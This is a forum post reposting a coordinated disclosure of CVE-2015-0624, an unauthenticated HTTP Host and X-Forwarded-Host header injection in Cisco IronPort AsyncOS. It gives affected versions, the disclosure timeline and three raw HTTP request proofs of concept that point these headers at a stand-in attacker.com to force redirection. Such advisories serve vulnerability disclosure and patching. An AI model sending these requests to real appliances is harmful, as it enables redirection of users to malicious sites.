Jump to content
Aerosol

Cisco Ironport AsyncOS HTTP Header Injection

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Cisco Ironport AsyncOS HTTP Header Injection
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s): 
  Cisco Ironport ESA - AsyncOS 8.0.1-023
  Cisco Ironport WSA - AsyncOS 8.5.5-021
  Cisco Ironport SMA - AsyncOS 8.4.0-138
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-0624

Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
20-02-2015: Vendor Advisory Release
24-02-2015: Public Disclosure

Description:
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation 
of user supplied input when handling HTTP Host and X-Forwarded-Host request headers.

An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a 
malicious website.

PoC #1

GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: ironport:8443:@[attacker.com]

PoC #2

GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: [attacker.com]

PoC #3

GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Host: ironport:8443
X-Forwarded-Host: [attacker.com]


References: 
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (MingW32) 

mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u
xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x
Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj
KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe
JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB
AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF
AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ
M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z
S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE
n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d
V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL
2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI=
=yiro
-----END PGP SIGNATURE-----

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...